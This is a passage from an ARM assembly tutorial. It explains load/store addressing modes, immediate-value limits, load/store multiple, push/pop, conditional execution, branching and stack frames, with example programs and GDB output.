        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 to R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register unmodified.   
        str r2, [r1, r2]! @ address mode: pre-indexed. Store value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register modified: R1 = R1+R2. 
        ldr r3, [r1], r2  @ address mode: post-indexed. Load value at memory address found in R1 to register R3. Then modify base register: R1 = R1+R2.
        bx lr
    
    adr_var1: .word var1
    adr_var2: .word var2

    After executing the first STR operation with the offset address mode, the value of R2 (0x00000003) will be stored at memory address 0x0001009c + 0x00000003 = 0x0001009F.

    gef> x/w 0x0001009F
     0x1009f <var2+3>: 0x00000003

    The second STR operation with the pre-indexed address mode will do the same, with the difference that it will update the base register (R1) with the calculated memory address (R1+R2).

    gef> info register r1
     r1     0x1009f      65695

    The last LDR operation uses the post-indexed address mode and loads the value at the memory address found in R1 into the register R2, then updates the base register R1 (R1+R2 = 0x1009f + 0x3 = 0x100a2).

    gef> info register r1
     r1      0x100a2     65698
    gef> info register r3
     r3      0x3       3

    3. Offset form: Scaled register as the offset

    LDR    Ra, [Rb, Rc, <shifter>]
    STR    Ra, [Rb, Rc, <shifter>]

    The third offset form has a scaled register as the offset. In this case, Rb is the base register and Rc is an immediate offset (or a register containing an immediate value) left/right shifted (<shifter>) to scale the immediate. This means that the barrel shifter is used to scale the offset. An example usage of this offset form would be for loops to iterate over an array. Here is a simple example you can run in GDB:

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1         @ load the memory address of var1 via label adr_var1 to R0
        ldr r1, adr_var2         @ load the memory address of var2 via label adr_var2 to R1
        ldr r2, [r0]             @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2, LSL#2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register (R1) unmodified.
        str r2, [r1, r2, LSL#2]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register modified: R1 = R1 + R2<<2
        ldr r3, [r1], r2, LSL#2  @ address mode: post-indexed. Load value at memory address found in R1 to the register R3. Then modifiy base register: R1 = R1 + R2<<2
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    The first STR operation uses the offset address mode and stores the value found in R2 at the memory location calculated from [r1, r2, LSL#2], which means that it takes the value in R1 as a base (in this case, R1 contains the memory address of var2), then it takes the value in R2 (0x3), and shifts it left by 2. The picture below is an attempt to visualize how the memory location is calculated with [r1, r2, LSL#2].

    The second STR operation uses the pre-indexed address mode. This means, it performs the same action as the previous operation, with the difference that it updates the base register R1 with the calculated memory address afterwards. In other words, it will first store the value found at the memory address R1 (0x1009c) + the offset left shifted by #2 (0x03 LSL#2 = 0xC) = 0x100a8, and update R1 with 0x100a8.

    gef> info register r1
    r1      0x100a8      65704

    The last LDR operation uses the post-indexed address mode. This means, it loads the value at the memory address found in R1 (0x100a8) into register R3, then updates the base register R1 with the value calculated with r2, LSL#2. In other words, R1 gets updated with the value R1 (0x100a8) + the offset R2 (0x3) left shifted by #2 (0xC) = 0x100b4.

    gef> info register r1
    r1      0x100b4      65716

    Summary

    Remember the three offset modes in LDR/STR:

    1. offset mode uses an immediate as offset
      • ldr   r3, [r1, #4]
    2. offset mode uses a register as offset
      • ldr   r3, [r1, r2]
    3. offset mode uses a scaled register as offset
      • ldr   r3, [r1, r2, LSL#2]

    How to remember the different address modes in LDR/STR:

    • If there is a !, it’s prefix address mode
      • ldr   r3, [r1, #4]!
      • ldr   r3, [r1, r2]!
      • ldr   r3, [r1, r2, LSL#2]!
    • If the base register is in brackets by itself, it’s postfix address mode
      • ldr   r3, [r1], #4
      • ldr   r3, [r1], r2
      • ldr   r3, [r1], r2, LSL#2
    • Anything else is offset address mode.
      • ldr   r3, [r1, #4]
      • ldr   r3, [r1, r2]
      • ldr   r3, [r1, r2, LSL#2]
    LDR FOR PC-RELATIVE ADDRESSING

    LDR is not only used to load data from memory into a register. Sometimes you will see syntax like this:

    .section .text
    .global _start
    
    _start:
       ldr r0, =jump        /* load the address of the function label jump into R0 */
       ldr r1, =0x68DB00AD  /* load the value 0x68DB00AD into R1 */
    jump:
       ldr r2, =511         /* load the value 511 into R2 */ 
       bkpt

    These instructions are technically called pseudo-instructions. We can use this syntax to reference data in the literal pool. The literal pool is a memory area in the same section (because the literal pool is part of the code) to store constants, strings, or offsets. In the example above we use these pseudo-instructions to reference an offset to a function, and to move a 32-bit constant into a register in one instruction. The reason why we sometimes need to use this syntax to move a 32-bit constant into a register in one instruction is because ARM can only load a 8-bit value in one go. What? To understand why, you need to know how immediate values are being handled on ARM.

    USING IMMEDIATE VALUES ON ARM

    Loading immediate values in a register on ARM is not as straightforward as it is on x86. There are restrictions on which immediate values you can use. What these restrictions are and how to deal with them isn’t the most exciting part of ARM assembly, but bear with me, this is just for your understanding and there are tricks you can use to bypass these restrictions (hint: LDR).

    We know that each ARM instruction is 32bit long, and all instructions are conditional. There are 16 condition codes which we can use and one condition code takes up 4 bits of the instruction. Then we need 2 bits for the destination register. 2 bits for the first operand register, and 1 bit for the set-status flag, plus an assorted number of bits for other matters like the actual opcodes. The point here is, that after assigning bits to instruction-type, registers, and other fields, there are only 12 bits left for immediate values, which will only allow for 4096 different values.

    This means that the ARM instruction is only able to use a limited range of immediate values with MOV directly.  If a number can’t be used directly, it must be split into parts and pieced together from multiple smaller numbers.

    But there is more. Instead of taking the 12 bits for a single integer, those 12 bits are split into an 8bit number (n) being able to load any 8-bit value in the range of 0-255, and a 4bit rotation field (r) being a right rotate in steps of 2 between 0 and 30. This means that the full immediate value v is given by the formula: v = n ror 2*r. In other words, the only valid immediate values are rotated bytes (values that can be reduced to a byte rotated by an even number).

    Here are some examples of valid and invalid immediate values:

    Valid values:
    #256        // 1 ror 24 --> 256
    #384        // 6 ror 26 --> 384
    #484        // 121 ror 30 --> 484
    #16384      // 1 ror 18 --> 16384
    #2030043136 // 121 ror 8 --> 2030043136
    #0x06000000 // 6 ror 8 --> 100663296 (0x06000000 in hex)
    
    Invalid values:
    #370        // 185 ror 31 --> 31 is not in range (0 – 30)
    #511        // 1 1111 1111 --> bit-pattern can’t fit into one byte
    #0x06010000 // 1 1000 0001.. --> bit-pattern can’t fit into one byte

    This has the consequence that it is not possible to load a full 32bit address in one go. We can bypass this restrictions by using one of the following two options:

    1. Construct a larger value out of smaller parts
      1. Instead of using MOV  r0, #511
      2. Split 511 into two parts: MOV r0, #256, and ADD r0, #255
    2. Use a load construct ‘ldr r1,=value’ which the assembler will happily convert into a MOV, or a PC-relative load if that is not possible.
      1. LDR r1, =511

    If you try to load an invalid immediate value the assembler will complain and output an error saying: Error: invalid constant. If you encounter this error, you now know what it means and what to do about it.
    Let’s say you want to load #511 into R0.

    .section .text
    .global _start
    
    _start:
        mov     r0, #511
        bkpt

    If you try to assemble this code, the assembler will throw an error:

    azeria@labs:~$ as test.s -o test.o
    test.s: Assembler messages:
    test.s:5: Error: invalid constant (1ff) after fixup

    You need to either split 511 in multiple parts or you use LDR as I described before.

    .section .text
    .global _start
    
    _start:
     mov r0, #256   /* 1 ror 24 = 256, so it's valid */
     add r0, #255   /* 255 ror 0 = 255, valid. r0 = 256 + 255 = 511 */
     ldr r1, =511   /* load 511 from the literal pool using LDR */
     bkpt

    If you need to figure out if a certain number can be used as a valid immediate value, you don’t need to calculate it yourself. You can use my little python script called rotator.py which takes your number as an input and tells you if it can be used as a valid immediate number.

    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 511
    
    Sorry, 511 cannot be used as an immediate number and has to be split.
    
    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 256
    
    The number 256 can be used as a valid immediate number.
    1 ror 24 --> 256
    LOAD/STORE MULTIPLE

    Sometimes it is more efficient to load (or store) multiple values at once. For that purpose we use LDM (load multiple) and STM (store multiple). These instructions have variations which basically differ only by the way the initial address is accessed. This is the code we will use in this section. We will go through each instruction step by step.

    .data
    
    array_buff:
     .word 0x00000000             /* array_buff[0] */
     .word 0x00000000             /* array_buff[1] */
     .word 0x00000000             /* array_buff[2]. This element has a relative address of array_buff+8 */
     .word 0x00000000             /* array_buff[3] */
     .word 0x00000000             /* array_buff[4] */
    
    .text
    .global _start
    
    _start:
     adr r0, words+12             /* address of words[3] -> r0 */
     ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
     ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */
     ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */
     stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */
     ldmia r0, {r4-r6}            /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */
     stmia r1, {r4-r6}            /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */
     ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
     stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */
     ldmda r0, {r4-r6}            /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */
     ldmdb r0, {r4-r6}            /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */
     stmda r2, {r4-r6}            /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */
     stmdb r2, {r4-r5}            /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */
     bx lr
    
    words:
     .word 0x00000000             /* words[0] */
     .word 0x00000001             /* words[1] */
     .word 0x00000002             /* words[2] */
     .word 0x00000003             /* words[3] */
     .word 0x00000004             /* words[4] */
     .word 0x00000005             /* words[5] */
     .word 0x00000006             /* words[6] */
    
    array_buff_bridge:
     .word array_buff             /* address of array_buff, or in other words - array_buff[0] */
     .word array_buff+8           /* address of array_buff[2] */

    Before we start, keep in mind that a .word refers to a data (memory) block of 32 bits = 4 BYTES. This is important for understanding the offsetting. So the program consists of .data section where we allocate an empty array (array_buff) having 5 elements. We will use this as a writable memory location to STORE data. The .text section contains our code with the memory operation instructions and a read-only data pool containing two labels: one for an array having 7 elements, another for “bridging” .text and .data sections so that we can access the array_buff residing in the .data section.

    adr r0, words+12             /* address of words[3] -> r0 */

    We use ADR instruction (lazy approach) to get the address of the 4th (words[3]) element into the R0. We point to the middle of the words array because we will be operating forwards and backwards from there.

    gef> break _start 
    gef> run
    gef> nexti

    R0 now contains the address of word[3], which in this case is 0x80B8. This means, our array starts at the address of word[0]: 0x80AC (0x80B8 –  0xC).

    gef> x/7w 0x00080AC
    0x80ac <words>: 0x00000000 0x00000001 0x00000002 0x00000003
    0x80bc <words+16>: 0x00000004 0x00000005 0x00000006

    We prepare R1 and R2 with the addresses of the first (array_buff[0]) and third (array_buff[2]) elements of the array_buff array. Once the addresses are obtained, we can start operating on them.

    ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
    ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */

    After executing the two instructions above, R1 and R2 contain the addresses of array_buff[0] and array_buff[2].

    gef> info register r1 r2
    r1      0x100d0     65744
    r2      0x100d8     65752

    The next instruction uses LDM to load two word values from the memory pointed by R0. So because we made R0 point to words[3] element earlier, the words[3] value goes to R4 and the words[4] value goes to R5.

    ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */

    We loaded multiple (2 data blocks) with one command, which set R4 = 0x00000003 and R5 = 0x00000004.

    gef> info registers r4 r5
    r4      0x3      3
    r5      0x4      4

    So far so good. Now let’s perform the STM instruction to store multiple values to memory. The STM instruction in our code takes values (0x3 and 0x4) from registers R4 and R5 and stores these values to a memory location specified by R1. We previously set the R1 to point to the first array_buff element so after this operation the array_buff[0] = 0x00000003 and array_buff[1] = 0x00000004. If not specified otherwise, the LDM and STM opperate on a step of a word (32 bits = 4 byte).

    stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */

    The values 0x3 and 0x4 should now be stored at the memory address 0x100D0 and 0x100D4. The following instruction inspects two words of memory at the address 0x000100D0.

    gef> x/2w 0x000100D0
    0x100d0 <array_buff>:  0x3   0x4

    As mentioned before, LDM and STM have variations. The type of variation is defined by the suffix of the instruction. Suffixes used in the example are: -IA (increase after), -IB (increase before), -DA (decrease after), -DB (decrease before). These variations differ by the way how they access the memory specified by the first operand (the register storing the source or destination address). In practice, LDM is the same as LDMIA, which means that the address for the next element to be loaded is increased after each load. In this way we get a sequential (forward) data loading from the memory address specified by the first operand (register storing the source address).

    ldmia r0, {r4-r6} /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */ 
    stmia r1, {r4-r6} /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x000100D0, 0x000100D4, and 0x000100D8 contain the values 0x3, 0x4, and 0x5.

    gef> info registers r4 r5 r6
    r4     0x3     3
    r5     0x4     4
    r6     0x5     5
    gef> x/3w 0x000100D0
    0x100d0 <array_buff>: 0x00000003  0x00000004  0x00000005

    The LDMIB instruction first increases the source address by 4 bytes (one word value) and then performs the first load. In this way we still have a sequential (forward) loading of data, but the first element is with a 4 byte offset from the source address. That’s why in our example the first element to be loaded from the memory into the R4 by LDMIB instruction is 0x00000004 (the words[4]) and not the 0x00000003 (words[3]) as pointed by the R0.

    ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
    stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x100D4, 0x100D8, and 0x100DC contain the values 0x4, 0x5, and 0x6.

    gef> x/3w 0x100D4
    0x100d4 <array_buff+4>: 0x00000004  0x00000005  0x00000006
    gef> info register r4 r5 r6
    r4     0x4    4
    r5     0x5    5
    r6     0x6    6

    When we use the LDMDA instruction everything starts to operate backwards. R0 points to words[3]. When loading starts we move backwards and load the words[3], words[2] and words[1] into R6, R5, R4. Yes, registers are also loaded backwards. So after the instruction finishes R6 = 0x00000003, R5 = 0x00000002, R4 = 0x00000001. The logic here is that we move backwards because we Decrement the source address AFTER each load. The backward registry loading happens because with every load we decrement the memory address and thus decrement the registry number to keep up with the logic that higher memory addresses relate to higher registry number. Check out the LDMIA (or LDM) example, we loaded lower registry first because the source address was lower, and then loaded the higher registry because the source address increased.

    Load multiple, decrement after:

    ldmda r0, {r4-r6} /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4     0x1    1
    r5     0x2    2
    r6     0x3    3

    Load multiple, decrement before:

    ldmdb r0, {r4-r6} /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4 0x0 0
    r5 0x1 1
    r6 0x2 2

    Store multiple, decrement after.

    stmda r2, {r4-r6} /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */

    Memory addresses of array_buff[2], array_buff[1], and array_buff[0] after execution:

    gef> x/3w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001 0x00000002

    Store multiple, decrement before:

    stmdb r2, {r4-r5} /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */

    Memory addresses of array_buff[1] and array_buff[0] after execution:

    gef> x/2w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001
    PUSH AND POP

    There is a memory location within the process called Stack. The Stack Pointer (SP) is a register which, under normal circumstances, will always point to an address wihin the Stack’s memory region. Applications often use Stack for temporary data storage. And As mentioned before, ARM uses a Load/Store model for memory access, which means that the instructions LDR / STR or their derivatives (LDM.. /STM..) are used for memory operations. In x86, we use PUSH and POP to load and store from and onto the Stack. In ARM, we can use these two instructions too:

    When we PUSH something onto the Full Descending stack the following happens:

    1. First, the address in SP gets DECREASED by 4.
    2. Second, information gets stored to the new address pointed by SP.

    When we POP something off the stack, the following happens:

    1. The value at the current SP address is loaded into a certain register,
    2. Address in SP gets INCREASED by 4.

    In the following example we use both PUSH/POP and LDMIA/STMDB:

    .text
    .global _start
    
    _start:
       mov r0, #3
       mov r1, #4
       push {r0, r1}
       pop {r2, r3}
       stmdb sp!, {r0, r1}
       ldmia sp!, {r4, r5}
       bkpt

    Let’s look at the disassembly of this code.

    azeria@labs:~$ as pushpop.s -o pushpop.o
    azeria@labs:~$ ld pushpop.o -o pushpop
    azeria@labs:~$ objdump -D pushpop
    pushpop: file format elf32-littlearm
    
    Disassembly of section .text:
    
    00008054 <_start>:
     8054: e3a00003 mov r0, #3
     8058: e3a01004 mov r1, #4
     805c: e92d0003 push {r0, r1}
     8060: e8bd000c pop {r2, r3}
     8064: e92d0003 push {r0, r1}
     8068: e8bd0030 pop {r4, r5}
     806c: e1200070 bkpt 0x0000

    As you can see, our LDMIA and STMDB instuctions got translated to PUSH and POP. That’s because PUSH is a synonym for STMDB sp!, reglist and POP is a synonym for LDMIA sp! reglist (see ARM Manual)

    Let’s run this code in GDB.

    gef> break _start
    gef> run
    gef> nexti 2
    [...]
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    After running the first two instructions we quickly checked what memory address and value SP points to. The next PUSH instruction should decrease SP by 8, and store the value of R1 and R0 (in that order) onto the Stack.

    gef> nexti
    [...] ----- Stack -----
    0xbefff7d8|+0x00: 0x3 <- $sp
    0xbefff7dc|+0x04: 0x4
    0xbefff7e0|+0x08: 0x1
    [...] 
    gef> x/w $sp
    0xbefff7d8: 0x00000003

    Next, these two values (0x3 and 0x4) are poped off the Stack into the registers, so that R2 = 0x3 and R3 = 0x4. SP is increased by 8:

    gef> nexti
    gef> info register r2 r3
    r2     0x3    3
    r3     0x4    4
    gef> x/w $sp
    0xbefff7e0: 0x00000001
    CONDITIONAL EXECUTION

    We already briefly touched the conditions’ topic while discussing the CPSR register. We use conditions for controlling the program’s flow during it’s runtime usually by making jumps (branches) or executing some instruction only when a condition is met. The condition is described as the state of a specific bit in the CPSR register. Those bits change from time to time based on the outcome of some instructions. For example, when we compare two numbers and they turn out to be equal, we trigger the Zero bit (Z = 1), because under the hood the following happens: a – b = 0. In this case we have EQual condition. If the first number was bigger, we would have a Greater Than condition and in the opposite case – Lower Than. There are more conditions, like Lower or Equal (LE), Greater or Equal (GE) and so on.

    The following table lists the available condition codes, their meanings, and the status of the flags that are tested.

    We can use the following piece of code to look into a practical use case of conditions where we perform conditional addition.

    .global main
    
    main:
            mov     r0, #2     /* setting up initial variable */
            cmp     r0, #3     /* comparing r0 to number 3. Negative bit get's set to 1 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            cmp     r0, #3     /* comparing r0 to number 3 again. Zero bit gets set to 1. Negative bit is set to 0 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            bx      lr

    The first CMP instruction in the code above triggers Negative bit to be set (2 – 3 = -1) indicating that the value in r0 is Lower Than number 3. Subsequently, the ADDLT instruction is executed because LT condition is full filled when V != N (values of overflow and negative bits in the CPSR are different). Before we execute second CMP, our r0 = 3. That’s why second CMP clears out Negative bit (because 3 – 3 = 0, no need to set the negative flag) and sets the Zero flag (Z = 1). Now we have V = 0 and N = 0 which results in LT condition to fail. As a result, the second ADDLT is not executed and r0 remains unmodified. The program exits with the result 3.

    CONDITIONAL EXECUTION IN THUMB

    In the Instruction Set chapter we talked about the fact that there are different Thumb versions. Specifically, the Thumb version which allows conditional execution (Thumb-2). Some ARM processor versions support the “IT” instruction that allows up to 4 instructions to be executed conditionally in Thumb state.

    Reference: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0552a/BABIJDIC.html

    Syntax: IT{x{y{z}}} cond

    • cond specifies the condition for the first instruction in the IT block
    • x specifies the condition switch for the second instruction in the IT block
    • y specifies the condition switch for the third instruction in the IT block
    • z specifies the condition switch for the fourth instruction in the IT block

    The structure of the IT instruction is “IF-Then-(Else)” and the syntax is a construct of the two letters T and E:

    • IT refers to If-Then (next instruction is conditional)
    • ITT refers to If-Then-Then (next 2 instructions are conditional)
    • ITE refers to If-Then-Else (next 2 instructions are conditional)
    • ITTE refers to If-Then-Then-Else (next 3 instructions are conditional)
    • ITTEE refers to If-Then-Then-Else-Else (next 4 instructions are conditional)

    Each instruction inside the IT block must specify a condition suffix that is either the same or logical inverse. This means that if you use ITE, the first and second instruction (If-Then) must have the same condition suffix and the third (Else) must have the logical inverse of the first two. Here are some examples from the ARM reference manual which illustrates this logic:

    ITTE   NE           ; Next 3 instructions are conditional
    ANDNE  R0, R0, R1   ; ANDNE does not update condition flags
    ADDSNE R2, R2, #1   ; ADDSNE updates condition flags
    MOVEQ  R2, R3       ; Conditional move
    
    ITE    GT           ; Next 2 instructions are conditional
    ADDGT  R1, R0, #55  ; Conditional addition in case the GT is true
    ADDLE  R1, R0, #48  ; Conditional addition in case the GT is not true
    
    ITTEE  EQ           ; Next 4 instructions are conditional
    MOVEQ  R0, R1       ; Conditional MOV
    ADDEQ  R2, R2, #10  ; Conditional ADD
    ANDNE  R3, R3, #1   ; Conditional AND
    BNE.W  dloop        ; Branch instruction can only be used in the last instruction of an IT block

    Wrong syntax:

    IT     NE           ; Next instruction is conditional     
    ADD    R0, R0, R1   ; Syntax error: no condition code used in IT block.

    Here are the conditional codes and their opposite:

    Let’s try this out with the following example code:

    .syntax unified    @ this is important!
    .text
    .global _start
    
    _start:
        .code 32
        add r3, pc, #1   @ increase value of PC by 1 and add it to R3
        bx r3            @ branch + exchange to the address in R3 -> switch to Thumb state because LSB = 1
    
        .code 16         @ Thumb state
        cmp r0, #10      
        ite eq           @ if R0 is equal 10...
        addeq r1, #2     @ ... then R1 = R1 + 2
        addne r1, #3     @ ... else R1 = R1 + 3
        bkpt

    .code 32

    This example code starts in ARM state. The first instruction adds the address specified in PC plus 1 to R3 and then branches to the address in R3.  This will cause a switch to Thumb state, because the LSB (least significant bit) is 1 and therefore not 4 byte aligned. It’s important to use bx (branch + exchange) for this purpose. After the branch the T (Thumb) flag is set and we are in Thumb state.

    .code 16

    In Thumb state we first compare R0 with #10, which will set the Negative flag (0 – 10 = – 10). Then we use an If-Then-Else block. This block will skip the ADDEQ instruction because the Z (Zero) flag is not set and will execute the ADDNE instruction because the result was NE (not equal) to 10.

    Stepping through this code in GDB will mess up the result, because you would execute both instructions in the ITE block. However running the code in GDB without setting a breakpoint and stepping through each instruction will yield to the correct result setting R1 = 3.

    BRANCHES

    Branches (aka Jumps) allow us to jump to another code segment. This is useful when we need to skip (or repeat) blocks of codes or jump to a specific function. Best examples of such a use case are IFs and Loops. So let’s look into the IF case first.

    .global main
    
    main:
            mov     r1, #2     /* setting up initial variable a */
            mov     r2, #3     /* setting up initial variable b */
            cmp     r1, r2     /* comparing variables to determine which is bigger */
            blt     r1_lower   /* jump to r1_lower in case r2 is bigger (N==1) */
            mov     r0, r1     /* if branching/jumping did not occur, r1 is bigger (or the same) so store r1 into r0 */
            b       end        /* proceed to the end */
    r1_lower:
            mov r0, r2         /* We ended up here because r1 was smaller than r2, so move r2 into r0 */
            b end              /* proceed to the end */
    end:
            bx lr              /* THE END */

    The code above simply checks which of the initial numbers is bigger and returns it as an exit code. A C-like pseudo-code would look like this:

    int main() {
       int max = 0;
       int a = 2;
       int b = 3;
       if(a < b) {
        max = b;
       }
       else {
        max = a;
       }
       return max;
    }

    Now here is how we can use conditional and unconditional branches to create a loop.

    .global main
    
    main:
            mov     r0, #0     /* setting up initial variable a */
    loop:
            cmp     r0, #4     /* checking if a==4 */
            beq     end        /* proceeding to the end if a==4 */
            add     r0, r0, #1 /* increasing a by 1 if the jump to the end did not occur */
            b loop             /* repeating the loop */
    end:
            bx lr              /* THE END */

    A C-like pseudo-code of such a loop would look like this:

    int main() {
       int a = 0;
       while(a < 4) {
       a= a+1;
       }
       return a;
    }

    B / BX / BLX

    There are three types of branching instructions:

    • Branch (B)
      • Simple jump to a function
    • Branch link (BL)
      • Saves (PC+4) in LR and jumps to function
    • Branch exchange (BX) and Branch link exchange (BLX)
      • Same as B/BL + exchange instruction set (ARM <-> Thumb)
      • Needs a register as first operand: BX/BLX reg

    BX/BLX is used to exchange the instruction set from ARM to Thumb.

    .text
    .global _start
    
    _start:
         .code 32         @ ARM mode
         add r2, pc, #1   @ put PC+1 into R2
         bx r2            @ branch + exchange to R2
    
        .code 16          @ Thumb mode
         mov r0, #1

    The trick here is to take the current value of the actual PC, increase it by 1, store the result to a register, and branch (+exchange) to that register. We see that the addition (add r2, pc, #1) will simply take the effective PC address (which is the current PC register’s value + 8 -> 0x805C) and add 1 to it (0x805C + 1 = 0x805D). Then, the exchange happens if the Least Significant Bit (LSB) of the address we branch to is 1 (which is the case, because 0x805D = 10000000 01011101), meaning the address is not 4 byte aligned. Branching to such an address won’t cause any misalignment issues. This is how it would look like in GDB (with GEF extension):

    Please note that the GIF above was created using the older version of GEF so it’s very likely that you see a slightly different UI and different offsets. Nevertheless, the logic is the same.

    Conditional Branches

    Branches can also be executed conditionally and used for branching to a function if a specific condition is met. Let’s look at a very simple example of a conditional branch suing BEQ. This piece of assembly does nothing interesting other than moving values into registers and branching to another function if a register is equal to a specified value. 

    .text
    .global _start
    
    _start:
       mov r0, #2
       mov r1, #2
       add r0, r0, r1
       cmp r0, #4
       beq func1
       add r1, #5
       b func2
    func1:
       mov r1, r0
       bx  lr
    func2:
       mov r0, r1
       bx  lr
    STACK AND FUNCTIONS

    In this part we will look into a special memory region of the process called the Stack. This chapter covers Stack’s purpose and operations related to it. Additionally, we will go through the implementation, types and differences of functions in ARM.

    STACK

    Generally speaking, the Stack is a memory region within the program/process. This part of the memory gets allocated when a process is created. We use Stack for storing temporary data such as local variables of some function, environment variables which helps us to transition between the functions, etc. We interact with the stack using PUSH and POP instructions. As explained in  Memory Instructions: Load And Store PUSH and POP are aliases to some other memory related instructions rather than real instructions, but we use PUSH and POP for simplicity reasons.

    Before we look into a practical example it is import for us to know that the Stack can be implemented in various ways. First, when we say that Stack grows, we mean that an item (32 bits of data) is put on to the Stack. The stack can grow UP (when the stack is implemented in a Descending fashion) or DOWN (when the stack is implemented in a Ascending fashion). The actual location where the next (32 bit) piece of information will be put is defined by the Stack Pointer, or to be precise, the memory address stored in the SP register. Here again, the address could be pointing to the current (last) item in the stack or the next available memory slot for the item. If the SP is currently pointing to the last item in the stack (Full stack implementation) the SP will be decreased (in case of Descending Stack) or increased (in case of Ascending Stack) and only then the item will placed in the Stack. If the SP is currently pointing to the next empty slot in the Stack, the data will be first placed and only then the SP will be decreased (Descending Stack) or increased (Ascending Stack).

     

    As a summary of different Stack implementations we can use the following table which describes which Store Multiple/Load Multiple instructions are used in different cases.

    In our examples we will use the Full descending Stack. Let’s take a quick look into a simple exercise which deals with such a Stack and it’s Stack Pointer.

    /* azeria@labs:~$ as stack.s -o stack.o && gcc stack.o -o stack && gdb stack */
    .global main
    
    main:
         mov   r0, #2  /* set up r0 */
         push  {r0}    /* save r0 onto the stack */
         mov   r0, #3  /* overwrite r0 */
         pop   {r0}    /* restore r0 to it's initial state */
         bx    lr      /* finish the program */

    At the beginning, the Stack Pointer points to address 0xbefff6f8 (could be different in your case), which represents the last item in the Stack. At this moment, we see that it stores some value (again, the value can be different in your case):

    gef> x/1x $sp
    0xbefff6f8: 0xb6fc7000

    After executing the first (MOV) instruction, nothing changes in terms of the Stack. When we execute the PUSH instruction, the following happens: first, the value of SP is decreased by 4 (4 bytes = 32 bits). Then, the contents of R0 are stored to the new address specified by SP. When we now examine the updated memory location referenced by SP, we see that a 32 bit value of integer 2 is stored at that location:

    gef> x/x $sp
    0xbefff6f4: 0x00000002

    The instruction (MOV r0, #3) in our example is used to simulate the corruption of the R0. We then use POP to restore a previously saved value of R0. So when the POP gets executed, the following happens: first, 32 bits of data are read from the memory location (0xbefff6f4) currently pointed by the address in SP. Then, the SP register’s value is increased by 4 (becomes 0xbefff6f8 again). The register R0 contains integer value 2 as a result.

    gef> info registers r0
    r0       0x2          2

    (Please note that the following gif shows the stack having the lower addresses at the top and the higher addresses at the bottom, rather than the other way around like in the first illustration of different Stack variations. The reason for this is to make it look like the Stack view you see in GDB)

    We will see that functions take advantage of Stack for saving local variables, preserving register state, etc. To keep everything organized, functions use Stack Frames, a localized memory portion within the stack which is dedicated for a specific function. A stack frame gets created in the prologue (more about this in the next section) of a function. The Frame Pointer (FP) is set to the bottom of the stack frame and then stack buffer for the Stack Frame is allocated. The stack frame (starting from it’s bottom) generally contains the return address (previous LR), previous Frame Pointer, any registers that need to be preserved, function parameters (in case the function accepts more than 4), local variables, etc. While the actual contents of the Stack Frame may vary, the ones outlined before are the most common. Finally, the Stack Frame gets destroyed during the epilogue of a function.

    Here is an abstract illustration of a Stack Frame within the stack:

    As a quick example of a Stack Frame visualization, let’s use this piece of code:

    /* azeria@labs:~$ gcc func.c -o func && gdb func */
    int main()
    {
     int res = 0;
